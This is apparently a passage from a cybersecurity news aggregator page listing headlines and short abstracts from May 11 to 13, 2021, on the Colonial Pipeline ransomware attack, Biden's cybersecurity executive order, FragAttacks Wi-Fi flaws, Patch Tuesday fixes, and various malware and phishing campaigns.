Abstract The Darkside ransomware gang first emerged in the threat landscape in August 2020. In recent months, the ransomware group was very active and targeted organizations worldwide.

ICSA

May 13, 2021 – General

Can Data Protection Systems Prevent Data At Rest Leakage? Full Text

Abstract Protection against insider risks works when the process involves controlling the data transfer channels or examining data sources. One approach involves preventing USB flash drives from being copied or sending them over email. The second one concerns preventing leakage or fraud in which an insider accesses files or databases with harmful intentions. What's the best way to protect your data? It seems obvious that prevention is the best way to solve any problem. In most cases, DCAP (data-centric audit and protection) and DAM (database activity monitoring) is sufficient. Both serve the purpose of protecting data at rest. The following example illustrates the approach we found in the Russian legal system. An employee of the Federal Migration Service in one of the Russian regions was approached by his friend, who asked him to hide information about two offenses in his file in the migrant database. The employee knew that this could be done remotely, accessed the database from home,

The Hacker News

May 13, 2021 – Government

Biden Executive Order Mandates Zero Trust and Strong Encryption Full Text

Abstract Wide-ranging measures win praise from industry experts

Infosecurity Magazine

May 13, 2021 – Government

Biden Signs Executive Order on Cybersecurity Full Text

Abstract President Biden signed an executive order on May 12, 2021, intended to address the country’s cybersecurity issues following the SolarWinds hack. The executive order, divided into 10 sections, includes components that set cybersecurity standards for federal contractors, remove barriers to the sharing of information, modernize federal government cybersecurity and attempt to improve “the integrity of the software supply chain,” among other priorities.

Lawfare

May 13, 2021 – Government

Biden signed executive order to improve the Nation’s Cybersecurity Full Text

Abstract President Joe Biden signed an ambitious executive order to dramatically improve the security of the US government networks. President Biden signed an executive order this week to improve the country's defenses against cyberattacks, it is an important...

Security Affairs

May 13, 2021 – General

Publishing exploits early doesn’t encourage patching or help defense, data shows Full Text

Abstract Despite debate in the threat intel community, a new study finds that publishing exploits before patches are available does more harm than good.

SCMagazine

May 13, 2021 – General

Five Critical Password Security Rules Your Employees Are Ignoring Full Text

Abstract According to Keeper Security’s Workplace Password Malpractice Report, many remote workers aren’t following best practices for password security.

Threatpost

May 13, 2021 – Solution

UK government releases free cyber-threat warning tool at annual CyberUK conference Full Text

Abstract The tool, called Early Warning, is the latest Active Cyber Defence (ACD) service from the NCSC, and was launched on the opening day of the government agency’s annual conference.

The Daily Swig

May 13, 2021 – Covid-19

Dark Web Getting Loaded With Bogus Covid-19 Vaccines and Forged Cards Full Text

Abstract Bogus COVID-19 test results, fraudulent vaccination cards, and questionable vaccines are emerging a hot commodity on the dark web in what's the latest in a long list of cybercrimes  capitalizing  on the  coronavirus  pandemic. "A new and troubling phenomenon is that consumers are buying COVID-19 vaccines on the black market due to the increased demand around the world,"  said  Anne An, a senior security researcher at McAfee's Advanced Programs Group (APG). "As a result, illegal COVID-19 vaccines and vaccination records are in high demand on darknet marketplaces." The growing demand and the race towards achieving herd immunity means at least a dozen underground marketplaces are peddling COVID-19 related merchandise, with Pfizer-BioNTech vaccines purchasable for $500 per dose from top-selling vendors who rely on services like Wickr, Telegram, WhatsApp, and Gmail for advertising and communications. Darknet listings for the supposed vaccines are being sold

The Hacker News

May 13, 2021 – Hacker

Colonial Pipeline Attackers Linked to Infamous REvil Group Full Text

Abstract East coast fuel pipeline slowly resumes operations

Infosecurity Magazine

May 13, 2021 – Government

US CISA and FBI publish joint alert on DarkSide ransomware Full Text

Abstract FBI and DHS's CISA have published a joint alert on DarkSide ransomware activity after the disruptive attack on Colonial Pipeline. FBI and DHS's CISA have published a joint alert to warn of ransomware attacks conducted by the DarkSide group. The alert...

Security Affairs

May 13, 2021 – Business

H&R Block seeks out open-source expertise to stock up on SOC talent Full Text

Abstract Open source experience can help propel professionals’ careers and bring diversity of thought to a security team. SC Media spoke to Carraig Stanwyck, H&R Block’s manager of global security operations, and Bernard Brantley, CISO at Corelight, to hear more.

SCMagazine

May 13, 2021 – Breach

Manchester City Council Exposes Number Plates of Over 60,000 Cars Charged with Parking Tickets Full Text

Abstract Drivers who picked up parking tickets during April-July 2020 had their identities exposed, thanks to the council forgetting to delete the number plates from the uploaded spreadsheets.

The Register

May 13, 2021 – General

Four Year On: Two-thirds of Global Firms Still Exposed to WannaCry Full Text

Abstract ExtraHop finds most enterprises are running insecure SMB protocol

Infosecurity Magazine

May 13, 2021 – General

Navigating the waters of maritime cybersecurity Full Text

Abstract Earlier this year, the U.S. government released a first of its kind National Maritime Cyber Security Plan (NMCP), accompanying recent maritime cybersecurity directives from the U.S. Coast Guard.

Help Net Security

May 13, 2021 – Ransomware

Ransomware Attackers Now Using Triple Extortion Tactics Against Victims’ Customers, Partners, and Other Third-Parties Full Text

Abstract In this tactic, the criminals send ransom demands not only to the attacked organization but to any customers, users, or other third parties that would be hurt by the leaked data.

Tech Republic

May 13, 2021 – Government

US President Biden Signs Executive Order to Bolster Federal Government’s Cybersecurity Full Text

Abstract The move is part of a broad effort to strengthen the United States’ defenses by encouraging private companies to practice better cybersecurity or risk being locked out of federal contracts.

New York Times

May 13, 2021 – Hacker

Beyond Lazarus: North Korean cyber-threat groups become top-tier, ‘reckless’ adversaries Full Text

Abstract Over recent years, North Korea has evolved from a nuisance to its neighbor South Korea and purveyor of ransomware and DDoS attacks to become the scourge of banks and cryptocurrency exchanges.

The Daily Swig

May 13, 2021 – General

Over 30,000 VoIP Devices Identifiable Worldwide Full Text

Abstract Researchers identified 38,335 public-facing VOIP/SIP devices worldwide. Aastra-Mitel tops the manufacturer list, the United States leads the list among countries, and London tops the chart for cities.

Cyber News

May 13, 2021 – General

SMBs increasingly face same cyber threats as large enterprises Full Text

Abstract For the first time since the Verizon Data Breach Investigations Report began tracking cyberattack techniques, threat patterns affecting small and medium businesses began to closely align with the patterns affecting large firms.

SCMagazine

May 12, 2021 – Government

Biden issues executive order to increase U.S. cybersecurity defenses Full Text

Abstract President Biden signed an executive order Wednesday to modernize the country's defenses against cyberattacks and give more timely access to information necessary for law enforcement to conduct investigations.

BleepingComputer

May 12, 2021 – Vulnerabilities

Microsoft fixes four critical vulnerabilities that pose risk to both data and infrastructure Full Text

Abstract Products affected by the Microsoft vulnerabilities include Hyper-V, Internet Explorer, Windows Server, and Windows 10.

SCMagazine

May 12, 2021 – Government

Biden signs massive order on cybersecurity Full Text

Abstract Biden signed a long-awaited executive order on cybersecurity, covering everything from federal procurement standards for private sector contractors to IoT security labels.

SCMagazine

May 12, 2021 – Government

Biden signs executive order to improve federal cybersecurity following major hacks Full Text

Abstract President Biden on Wednesday signed an executive order aimed at improving federal cybersecurity, with the order coming on the heels of multiple major and damaging cyberattacks including the one on the Colonial Pipeline.  

The Hill

May 12, 2021 – General

Hillicon Valley: Global cybersecurity leaders say they feel unprepared for attack | Senate Commerce Committee advances Biden’s FTC nominee Lina Khan | Senate panel approves bill that would invest billions in tech Full Text

Abstract Starting out with some good news tonight: Colonial Pipeline is back online after shutting down over a cyberattack last weekend. Meanwhile, a number of global chief information security officers said they think their organizations are unprepared to face a cyberattack, according to a report released Wednesday. The Senate Commerce Committee advanced President BidenJoe BidenKinzinger, Gaetz get in back-and-forth on Twitter over Cheney vote Cheney in defiant floor speech: Trump on 'crusade to undermine our democracy' US officials testify on domestic terrorism in wake of Capitol attack MORE’s nominee to the Federal Trade Commission, Lina Khan, and to approve legislation that would invest billions in science and emerging technologies in an effort to compete with China.

The Hill

May 12, 2021 – General

How Companies Need to Treat User Data and Manage Their Partners Full Text

Abstract After the introduction of CCPA and GDPR, much more attention is given to third-party risks, and the privacy terms and conditions users agree to.  Global privacy regulations, such as the CCPA and GDPR, were enacted to ensure stricter standards...

Security Affairs

May 12, 2021 – Attack

Colonial Pipeline restarting operations after cyberattack Full Text

Abstract Colonial Pipeline announced Wednesday that it has begun a restart of its operations after a cyberattack forced the company to shut down late last week, leading to gas shortages on the East Coast.

The Hill

May 12, 2021 – General

Report finds old misconfiguration woes continue to hammer corporate clouds Full Text

Abstract Misconfigured storage buckets and leaky APIs remain two of the top causes behind cloud breaches.

SCMagazine

May 12, 2021 – Vulnerabilities

Microsoft Patch Tuesday for May 2021 fix 4 critical flaws Full Text

Abstract Microsoft Patch Tuesday for May 2021 security updates addressed 55 vulnerabilities, four are rated as Critical. Microsoft Patch Tuesday for May 2021 security updates address 55 vulnerabilities in Microsoft Windows, .NET Core and Visual Studio, Internet...

Security Affairs

May 12, 2021 – Phishing

167 counterfeit apps used for financial scams against Android and iOS users Full Text

Abstract Researchers found 167 counterfeit Android and iOS apps that attackers used to steal money from victims who believed they installed a financial trading, banking or cryptocurrency app from a trusted provider.

SCMagazine

May 12, 2021 – General

Energy Sector Witnesses a Rise in Cyberattacks Full Text

Abstract The energy sector worldwide is witnessing increasing cyber risks, with one of the largest fuel pipeline systems in the U.S. now becoming a ransomware attack victim. Such disruptions could lead to devastating outcomes.

Cyware Alerts - Hacker News

May 12, 2021 – Vulnerabilities

Researchers Flag e-Voting Security Flaws Full Text

Abstract Paper ballots and source-code transparency are recommended to improve election security.

Threatpost

May 12, 2021 – Ransomware

Colonial Pipeline has no plans to pay ransom for files: report Full Text

Abstract Colonial Pipeline has no plans to pay the ransom after a cyber attack on their operations, two people familiar with the matter told The Washington Post on Wednesday.

The Hill

May 12, 2021 – Malware

Lemon Duck Cryptominer has Made a Comeback Full Text

Abstract Microsoft Exchange servers are once again under attack by the Lemon Duck cryptocurrency mining botnet, which recently beefed up its anti-detection capabilities. Organizations should stay vigilant against this threat and use reliable anti-malware defenses.

Cyware Alerts - Hacker News

May 12, 2021 – Covid-19

Telegram Fraudsters Ramp Up Forged COVID-19 Vaccine Card Sales Full Text

Abstract A new type of fraud is spiking across the platform: Selling fake vax records to people who want to lie their way into places where proof of vaccine is required.

Threatpost

May 12, 2021 – Government

House lawmakers roll out bill to invest $500 million in state and local cybersecurity Full Text

Abstract A group of bipartisan House lawmakers on Wednesday rolled out legislation that would provide state and local governments with $500 million annually to defend against cyberattacks, which have escalated over the past year during the COVID-19 pandemic. 

The Hill

May 12, 2021 – General

SVR Cyber Operators are Taking Intelligence Advisories Seriously Full Text

Abstract The U.S. security agencies have issued advisories against highly dangerous cyber threats from Russian Foreign Intelligence Service (SVR) operators (APT29, Cozy Bear, and Dukes), and the threat actors are adapting accordingly.

Cyware Alerts - Hacker News

May 12, 2021 – Criminals

Cybercriminals Use Fake Android and iOS Apps Disguised as Trading and Cryptocurrency Apps to Conduct Fraud Full Text

Abstract These fraudulent applications are aimed at exploiting the increased interest in trading apps, driven by the recent significant rise in the value of cryptocurrencies and interest in stock trading.

Sophos

May 12, 2021 – Malware

A Triple Combo of DoubleDrop, DoubleDrag, and DoubleBack Malware Full Text

Abstract Three new malware DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, associated with a massive cyberespionage campaign, have been targeting several organizations in the U.S. The related phishing attacks were carried out by a new financially motivated threat actor group dubbed UNC2529.

Cyware Alerts - Hacker News

May 12, 2021 – Vulnerabilities

Microsoft fixes WSUS bug blocking May Windows security updates Full Text

Abstract Microsoft has resolved a known issue preventing managed devices from receiving the May 2021 Patch Tuesday security updates.

BleepingComputer

May 12, 2021 – Malware

21Nails Exim Bugs and Remote Code Execution: Beware Full Text

Abstract The Qualys Research Team found 10 remotely exploitable and 11 locally security flaws, collectively known as 21Nails. Versions prior to Exim 4.94.2 are vulnerable to attacks exploiting 21Nails.

Cyware Alerts - Hacker News

May 12, 2021 – General

Unstoppable Cyberattacks on Healthcare Facilities Full Text

Abstract While it has been more than a year since the pandemic struck and the world lost more than 3 million lives, threat actors are still hell-bent on disrupting the networks of healthcare facilities, with no concern for human lives.

Cyware Alerts - Hacker News

May 12, 2021 – Ransomware

CISA Analysis on FiveHands Ransomware Full Text

Abstract The CISA has published a report on the FiveHands ransomware deployed by an aggressively financially motivated group - UNC2447. The campaign involved extortion incidents between January and February.

Cyware Alerts - Hacker News

May 12, 2021 – Ransomware

A Dive into the Consequences of Ransomware Payoffs Full Text

Abstract While ransomware operators have adopted various extortion tactics to make their victims pay up, it's important to take a look at key statistics on victims paying or not paying the ransom.

Cyware Alerts - Hacker News

May 12, 2021 – Phishing

FBI Warns of Cybercriminals Abusing Search Advertisements to Promote Phishing Sites Full Text

Abstract The FBI says that cybercrime gangs are using search results and search engine ads to lure victims on phishing sites for financial institutions in order to collect their login credentials.

The Record

May 12, 2021 – Business

Microvirtualization at the heart of new HP hardware line Full Text

Abstract The crown jewel security feature is HP’s micro-virtualization and isolation technology, which shift risky activities to hardware-enforced virtual machines.

SCMagazine

May 12, 2021 – General

Ghostwriter: A Russia-Linked Influence Campaign Full Text

Abstract In July 2020, a cyber-enabled influence campaign, dubbed Ghostwriter, was spotted. It mainly targeted Poland, Lithuania, and Latvia. However, based on some developments reported by researchers, the campaign has been attributed to an uncategorized threat actor.

Cyware Alerts - Hacker News

May 12, 2021 – Malware

Microsoft: Threat actors target aviation orgs with new malware Full Text

Abstract Microsoft warns of an ongoing spear-phishing campaign targeting aerospace and travel organizations with multiple remote access trojans (RATs) deployed using a new and stealthy malware loader.

BleepingComputer

May 12, 2021 – Vulnerabilities

‘Frag Attacks’ Vulnerabilities in WiFi Standard Affect WiFi-enabled Devices Dating Back to 1997 Full Text

Abstract A Belgian security researcher has discovered a series of vulnerabilities that impact the WiFi standard, with some bugs dating back as far back as 1997 and affecting devices sold for the past 24 years.

The Record

May 12, 2021 – Hacker

Gig Workers Paid $500 for Payroll Passwords Full Text

Abstract Argyle is paying workers to help hack payroll providers, researchers suspect.

Threatpost

May 12, 2021 – Phishing

Trust Wallet, MetaMask crypto wallets targeted by new support scam Full Text

Abstract Trust Wallet and MetaMask wallet users are being targeted in ongoing and aggressive Twitter phishing attacks to steal cryptocurrency funds.

BleepingComputer

May 12, 2021 – Business

Cyber risk management startup VisibleRisk secures $25M Full Text

Abstract The Series A funding round — which comes as VisibleRisk launches a new risk assessment service, Cyber Rating — will be used to expand the company’s workforce well into this year.

Venture Beat

May 12, 2021 – Vulnerabilities

FragAttacks vulnerabilities expose all WiFi devices to hack Full Text

Abstract Security researcher discovered a series of flaws, collectively tracked as FragAttacks, that impact the WiFi devices sold for the past 24 years. Belgian security researcher Mathy Vanhoef disclosed the details of a multiple vulnerabilities, tracked...

Security Affairs

May 12, 2021 – Government

Wyden pushes for information on federal agencies’ Zoom use, citing security concerns Full Text

Abstract Sen. Ron Wyden (D-Ore.) on Wednesday drilled the General Services Administration (GSA) around its ongoing approval of video conferencing app Zoom for government use, despite security vulnerabilities discovered by researchers in recent years. 

The Hill

May 12, 2021 – Vulnerabilities

SAP Patches High-Severity Flaws in Business One, NetWeaver Products Full Text

Abstract Tech giant SAP has released a total of six new security notes on its May 2021 Security Patch Day, along with updates for five other security notes, including three rated Hot News.

Security Week

May 12, 2021 – Business

Cybersecurity startup Panaseer raises $26.5M Series B led by AllegisCyber Capital Full Text

Abstract Existing investors, including Evolution Equity Partners, Notion Capital, AlbionVC, Cisco Investments and Paladin Capital Group, as well as new investor National Grid Partners, also participated.

TechCrunch

May 12, 2021 – Vulnerabilities

‘FragAttacks’: Wi-Fi Bugs Affect Millions of Devices Full Text

Abstract Wi-Fi devices going back to 1997 are vulnerable to attackers who can steal your data if they’re in range.

Threatpost

May 12, 2021 – Government

South Korea orders urgent review of energy infrastructure cybersecurity Full Text

Abstract Minister of Trade, Industry, and Energy Moon Seung-wook convened a meeting yesterday, saying it was needed considering the attack on Colonial Pipeline, one of the USA’s main oil transport facilities.

The Register

May 12, 2021 – Ransomware

Police Doxxed After Ransom Dispute Full Text

Abstract Washington DC Metropolitan Police records allegedly leaked online during National Policing Week

Infosecurity Magazine

May 12, 2021 – Business

Microsoft’s new project ports Linux eBPF to Windows 10, Server Full Text

Abstract Microsoft has launched a new open-source project that aims to add to Windows the benefits of eBPF, a technology first implemented in Linux that allows attaching programs in both kernel and user applications.

BleepingComputer

May 12, 2021 – General

More Domestic Abuse Cases Involve Tech Full Text

Abstract UK experts report rise in number of domestic abuse cases involving complex use of digital technology

Infosecurity Magazine

May 12, 2021 – Ransomware

Shining a Light on DARKSIDE Ransomware Operations Full Text

Abstract In addition to providing builds of DARKSIDE ransomware, the operators of this service also maintain a blog accessible via TOR. This site is also used to pressure victims into paying ransoms.

FireEye

May 12, 2021 – Privacy

INTERPOL Launches Digital Piracy Project Full Text

Abstract New initiative aims to counter online piracy and dismantle illicit online marketplaces

Infosecurity Magazine

May 12, 2021 – Ransomware

UK’s Computer Misuse Act to be reviewed, says Home Secretary as she condemns ransomware payoffs Full Text

Abstract UK Home Secretary Priti Patel has promised a government review of the UK's 30-year-old Computer Misuse Act "this year" as well as condemning companies that buy off ransomware criminals.

The Register

May 12, 2021 – Government

UK Government Drafts New Legislation to Force Tech Firms to Tackle Online Abuse Full Text

Abstract The bill will cover a range of online harms, including child sexual abuse, harassment, and fraud

Infosecurity Magazine

May 12, 2021 – Business

Apple service provider Jamf buys zero-trust software vendor Wandera for $400 million Full Text

Abstract Apple enterprise support services provider Jamf this afternoon said it will acquire nine-year-old startup Wandera of San Francisco, a provider of cloud-based software for "zero trust" security.

ZDNet

May 12, 2021 – Breach

Companies’ 5 Million Personal identifiable information records detected on an AWS service due to misconception of users Full Text

Abstract During this research, CPR detected several SSM documents that led to the discovery of over 5 million Personally identifiable information records and credit card transactions for several companies.

Check Point Research

May 12, 2021 – General

Cyberspace Is Neither Just an Intelligence Contest, nor a Domain of Military Conflict; SolarWinds Shows Us Why It’s Both Full Text

Abstract Future conversation needs to move beyond the military versus intelligence contest binary construct to more meaningfully explore how states may seek to use cyberspace for multiple objectives, either in sequence or in parallel.

Lawfare

May 12, 2021 – Vulnerabilities

Maybe don’t call Saul? Over 30,000 VoIP devices identifiable worldwide, some with suspected vulnerabilities Full Text

Abstract Thousands of public-facing devices can be accessed anywhere in the world, from the US to Russia, from London to Johannesburg. Our research shows that large and small manufacturers are identifiable, with Aastra-Mitel topping the list. As with many...

Security Affairs

May 12, 2021 – Vulnerabilities

All Wi-Fi devices impacted by new FragAttacks vulnerabilities Full Text

Abstract Newly discovered Wi-Fi security vulnerabilities collectively known as FragAttacks (fragmentation and aggregation attacks) are impacting all Wi-Fi devices (including computers, smartphones, and smart devices) going back as far as 1997.

BleepingComputer

May 12, 2021 – Vulnerabilities

Australia: 328 weaknesses found by WA Auditor-General in 50 local government systems Full Text

Abstract The computer systems of 50 Western Australian local government entities were probed and the result was the finding of 328 control weaknesses, with 33 considered as significant by the Auditor-General.

ZDNet

May 12, 2021 – General

Global cybersecurity leaders say they feel unprepared for attack: report Full Text

Abstract A majority of global chief information security officers (CISOs) surveyed as part of a report released Wednesday said they feel their organizations are unprepared to face a cyberattack, despite many believing they will face an attack in the next year.

The Hill

May 12, 2021 – Vulnerabilities

Nearly All Wi-Fi Devices Are Vulnerable to New FragAttacks Full Text

Abstract Three design and multiple implementation flaws have been disclosed in IEEE 802.11 technical standard that undergirds Wi-Fi, potentially enabling an adversary to take control over a system and plunder confidential data. Called  FragAttacks  (short for FRgmentation and AGgregation attacks), the weaknesses impact all Wi-Fi security protocols, from Wired Equivalent Privacy (WEP) all the way to Wi-Fi Protected Access 3 (WPA3), thus virtually putting almost every wireless-enabled device at risk of attack. "An adversary that is within radio range of a victim can abuse these vulnerabilities to steal user information or attack devices," Mathy Vanhoef, a security academic at New York University Abu Dhabi, said. "Experiments indicate that every Wi-Fi product is affected by at least one vulnerability and that most products are affected by several vulnerabilities." IEEE 802.11 provides the basis for all modern devices using the Wi-Fi family of network protocols, allowing lap

The Hacker News

May 12, 2021 – Government

#CYBERUK21: Foreign Secretary Sets Out UK’s Global Cyber Vision Full Text

Abstract Dominic Raab says the UK and its allies must partner with the poorest regions in cyberspace

Infosecurity Magazine

May 12, 2021 – Malware

TeaBot Android banking Trojan targets banks in Europe Full Text

Abstract Malware researchers from Cleafy warn of a new Android banking trojan dubbed TeaBot (aka Anatsa) that is targeting banks in Europe. Malware experts from the Italian cybersecurity firm Cleafy have spotted a new Android banking trojan dubbed TeaBot (aka...

Security Affairs

May 12, 2021 – General

‘Everyone had to rethink security’: What Microsoft learned from a chaotic year Full Text

Abstract Microsoft Corporate Vice President of Security, Compliance and Identity Vasu Jakkal spoke to SC Media about lessons learned from the year that brought COVID and, in particular, the Solarigate/ SUNBURST campaign.

SCMagazine

May 12, 2021 – Malware

TeaBot Trojan Targets Banks via Hijacked Android Handsets Full Text

Abstract Malware first observed in Italy can steal victims’ credentials and SMS messages as well as livestream device screens on demand.

Threatpost

May 12, 2021 – Vulnerabilities

Time to patch against FragAttacks but good luck with home routers and IoT devices Full Text

Abstract Several of the flaws relate to the ability to inject plaintext frames, as well as certain devices accepting any unencrypted frame or plaintext aggregated frames that look like handshake messages.

ZDNet

May 12, 2021 – Vulnerabilities

Latest Microsoft Windows Updates Patch Dozens of Security Flaws Full Text

Abstract Microsoft on Tuesday rolled out its scheduled  monthly security update  with patches for 55 security flaws affecting Windows, Exchange Server, Internet Explorer, Office, Hyper-V, Visual Studio, and Skype for Business. Of these 55 bugs, four are rated as Critical, 50 are rated as Important, and one is listed as Moderate in severity. Three of the vulnerabilities are publicly known, although, unlike  last month , none of them are under active exploitation at the time of release. The most critical of the flaws addressed is  CVE-2021-31166 , a wormable remote code execution vulnerability in the HTTP protocol stack. The issue, which could allow an unauthenticated attacker to send a specially crafted packet to a targeted server, is rated 9.8 out of a maximum of 10 on the CVSS scale. Another vulnerability of note is a remote code execution flaw in Hyper-V ( CVE-2021-28476 ), which also scores the highest severity among all flaws patched this month with a CVSS rating of 9.9. "This i

The Hacker News

May 12, 2021 – General

Home Working Parents and Young Adults Are Most Risky IT Users Full Text

Abstract HP Inc study warns of blurred lines between work and personal lives

Infosecurity Magazine

May 12, 2021 – 5G

NSA and ODNI analyze potential risks to 5G networks Full Text

Abstract U.S. Intelligence agencies warn of weaknesses in 5G networks that could be exploited by crooks and nation-state actors for intelligence gathering. The U.S. National Security Agency (NSA), along with the DHS Cybersecurity and Infrastructure Security...

Security Affairs

May 12, 2021 – General

Removal of Fraudulent URLs Jumped 15-Fold in 2020, NCSC Says Full Text

Abstract In 2020, The National Cyber Security Centre’s (NCSC) Active Cyber Defense (ACD) program managed to curb the online scam economy in a record-breaking takedown of 700,595 scams.

Bitdefender

May 12, 2021 – Ransomware

Ransomware Gang Leaks Metropolitan Police Data After Failed Negotiations Full Text

Abstract The cybercrime syndicate behind Babuk ransomware has leaked more personal files belonging to the Metropolitan Police Department (MPD) after negotiations with the DC Police broke down, warning that they intend to publish all data if their ransom demands are not met. "The negotiations reached a dead end, the amount we were offered does not suit us, we are posting 20 more personal files on officers, you can download this archive, the password will be released tomorrow. if during tomorrow they do not raise the price, we will release all the data," the gang said in a statement on their data leak site. "You still have the ability to stop it," it added. The Babuk group is said to have  stolen 250GB of data , including investigation reports, arrests, disciplinary actions, and other intelligence briefings. Like other ransomware platforms, DarkSide adheres to a practice called double extortion, which involves demanding money in return for unlocking files and servers en

The Hacker News

May 12, 2021 – Vulnerabilities

Microsoft Fixes Exchange Server Zero-Day in May Patch Tuesday Full Text

Abstract Bug was first disclosed in Pwn2Own competition last month

Infosecurity Magazine

May 12, 2021 – General

Why threat hunting is obsolete without context Full Text

Abstract Threat hunting is implemented by IT professionals to find dormant or active threats on their network to better understand and harness network visibility and threat actor entry points.

Help Net Security

May 12, 2021 – Vulnerabilities

Half of Government Security Incidents Caused by Missing Patches Full Text

Abstract Risks are driving IT modernization push, according to BAE Systems

Infosecurity Magazine

May 11, 2021 – Vulnerabilities

Alert: Hackers Exploit Adobe Reader 0-Day Vulnerability in the Wild Full Text

Abstract Adobe has released  Patch Tuesday updates  for the month of May with fixes for multiple vulnerabilities spanning 12 different products, including a zero-day flaw affecting Adobe Reader that's actively exploited in the wild. The list of updated applications includes Adobe Experience Manager , Adobe InDesign , Adobe Illustrator , Adobe InCopy , Adobe Genuine Service , Adobe Acrobat and Reader, Magento , Adobe Creative Cloud Desktop Application, Adobe Media Encoder , Adobe After Effects , Adobe Medium, and Adobe Animate. In a security bulletin, the company  acknowledged  it received reports that the flaw "has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows." Tracked as CVE-2021-28550, the zero-day concerns an arbitrary code execution flaw that could allow adversaries to execute virtually any command on target systems. While the targeted attacks took aim at Windows users of Adobe Reader, the issue affects both Windows and macOS ver

The Hacker News

May 11, 2021 – Breach

AWS configuration issues lead to exposure of 5 million records Full Text

Abstract Amazon Web Services System Manager misconfigurations led to the potential exposure of more than 5 million documents with personally identifiable information and credit card transactions on more than 3,000 SSM documents.

SCMagazine

May 11, 2021 – General

Hillicon Valley: Feds eye more oversight of pipelines after Colonial attack | White House monitoring fuel shortages | Democrats urge Facebook to reverse WhatsApp update | Biden announces deal with Uber, Lyft for free vaccine rides Full Text

Abstract The impact of the ransomware attack on Colonial Pipeline continued to make waves Tuesday, with the Biden administration and members of Congress weighing further oversight of the oil and gas sector, and officials scrambling to respond to oil shortages in portions of the country. Meanwhile, members of the Congressional Hispanic Caucus urged Facebook to reverse a privacy update for WhatsApp, and President BidenJoe BidenCaitlyn Jenner says election was not 'stolen,' calls Biden 'our president' Manchin, Biden huddle amid talk of breaking up T package Overnight Energy: 5 takeaways from the Colonial Pipeline attack | Colonial aims to 'substantially' restore pipeline operations by end of week | Three questions about Biden's conservation goals MORE announced a partnership with Uber and Lyft to provide free rides for Americans to get COVID-19 vaccines.  

The Hill

May 11, 2021 – Vulnerabilities

Hackers target Windows users exploiting a Zero-Day in Reader Full Text

Abstract Adobe confirmed that a zero-day vulnerability affecting Adobe Reader for Windows has been exploited in the wild in limited attacks. Adobe security updates for May 2021 address at least 43 CVEs in Experience Manager, InDesign, Illustrator, InCopy,...

Security Affairs

May 11, 2021 – Government

Feds eye more oversight of pipelines after Colonial attack Full Text

Abstract The Biden administration and Capitol Hill are taking a closer look at the security in place for critical oil and gas utilities following the Colonial Pipeline shutdown.

The Hill

May 11, 2021 – Vulnerabilities

Wormable Windows Bug Opens Door to DoS, RCE Full Text

Abstract Microsoft’s May 2021 Patch Tuesday updates include fixes for four critical security vulnerabilities.

Threatpost

May 11, 2021 – Phishing

Zix tricks: Phishing campaign creates false illusion that emails are safe Full Text

Abstract The malicious scheme hides behind multiple layers of redirect links in order to confuse security systems.

SCMagazine

May 11, 2021 – Business

GitHub Prepares to Move Beyond Passwords Full Text

Abstract GitHub adds support for FIDO2 security keys for Git over SSH to fend off account hijacking and further its plan to stick a fork in the security bane of passwords.

Threatpost

May 11, 2021 – Government

Government says Colonial Pipeline has not shared data on hack Full Text

Abstract The Department of Homeland Security’s top cyber agency said Tuesday that it has not yet received important technical information from Colonial Pipeline regarding the crippling hack that led it to shut down a key fuel pipeline last week.

The Hill

May 11, 2021 – Government

Katko probes federal oversight of oil and gas industry cybersecurity Full Text

Abstract House Homeland Security Committee ranking member John Katko (R-N.Y.) on Tuesday dug into federal oversight of oil and gas sector cybersecurity in the wake of the shutdown of the Colonial Pipeline after a ransomware attack last week. 

The Hill

May 11, 2021 – Breach

Kansas Identity Theft Spike Could Be Linked to Data Breach Full Text

Abstract Alleged data breach at Kansas Department of Labor may account for state leading national unemployment fraud stats

Infosecurity Magazine

May 11, 2021 – Outage

Southeast sees gas shortages amid pipeline shutdown Full Text

Abstract Parts of the Southeastern U.S. are seeing gasoline shortages following a cyberattack that shut down Colonial Pipeline.

The Hill

May 11, 2021 – Vulnerabilities

Hackers Leverage Adobe Zero-Day Bug Impacting Acrobat Reader Full Text

Abstract A patch for Adobe Acrobat, the world’s leading PDF reader, fixes a vulnerability under active attack affecting both Windows and macOS systems that could lead to arbitrary code execution.

Threatpost

May 11, 2021 – Hacker

Researcher hacked Apple AirTag two weeks after its launch Full Text

Abstract Apple AirTag has been launched less than two weeks ago, but a security researcher already claims to have hacked them.  The Apple AirTag has been available for just a couple of weeks and hacking community is already working on it to demonstrate...

Security Affairs

May 11, 2021 – Ransomware

Cuba Ransomware Joining Hands with Hancitor Malware Full Text

Abstract The Cuba Ransomware group and the operators behind the Hancitor downloader have reportedly united for easy access to compromised corporate networks. For years, Cuba ransomware has been in and out of the ransomware game; it came to the limelight after the ATFS attack.

Cyware Alerts - Hacker News

May 11, 2021 – Hacker

Sophisticated Cyber Group Designs Evasive Toolsets Full Text

Abstract Researchers from Kaspersky uncover an ongoing espionage campaign called TunnelSnake targeting Asian and African diplomats and some high-profile organizations. The attack is being allegedly conducted by Chinese actors.

Cyware Alerts - Hacker News

May 11, 2021 – Malware

Fake Chrome App Anchors Rapidly Worming ‘Smish’ Cyberattack Full Text

Abstract An ingenious attack on Android devices self-propagates, with the potential for a range of damage.

Threatpost

May 11, 2021 – Vulnerabilities

Google Patches 19 Vulnerabilities With Chrome 90 Update Full Text

Abstract Chrome components affected by these issues include Web App Installs, Offline, Media Feeds, Aura, Tab Groups, Notifications, V8, Autofill, File API, History, Reader Mode, Payments, and Tab Strip.

Security Week

May 11, 2021 – Hacker

Roaming Mantis Evolving and Improvising its Smishing Campaign Full Text

Abstract The Roaming Mantis threat actor group has improved its attack tactic to steal more funds while evading detection. The group is now using whitelisting to spread two new malware families. R esearchers suspect that this could be the work of more than one group of attackers working together.

Cyware Alerts - Hacker News

May 11, 2021 – Privacy

Germany Bans Facebook from Processing WhatsApp Data Full Text

Abstract Privacy regulator bars Facebook from collecting data on WhatsApp users in Germany

Infosecurity Magazine

May 11, 2021 – Vulnerabilities

Microsoft May 2021 Patch Tuesday fixes 55 flaws, 3 zero-days Full Text

Abstract Today is Microsoft's May 2021 Patch Tuesday, and with it comes three zero-day vulnerabilities, so Windows admins will be rushing to apply updates. 

BleepingComputer

May 11, 2021 – Ransomware

Project Signal: A Ransomware Operation Sponsored by Iran Full Text

Abstract Iran's Islamic Revolutionary Guard Corps has been accused of running a state-sponsored ransomware operation through a contracting company known as Emen Net Pasargard.

Cyware Alerts - Hacker News

May 11, 2021 – Government

AGs Question Safety of Kids-Only Instagram Full Text

